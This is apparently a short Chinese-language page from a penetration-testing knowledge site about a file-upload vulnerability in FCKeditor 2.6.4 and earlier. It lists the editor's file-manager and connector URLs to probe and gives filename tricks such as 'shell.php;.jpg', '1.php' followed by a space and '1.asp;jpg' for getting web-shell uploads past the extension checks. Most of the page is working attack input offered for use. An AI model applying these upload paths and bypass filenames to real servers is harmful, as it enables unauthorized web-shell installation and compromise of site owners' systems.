secskill
Search…
⌃K

1.7.2.1 fckeditor<=2.6.4文件上传漏洞

上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

漏洞利用

我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。
提交1.php+空格 就可以绕过去所有的,
asp绕过:
上传asp凉凉,1.asp;.jpg凉凉,因为fck2.6.4版本会重命名为1_asp;.jpg
上传1.asp;jpg上传成功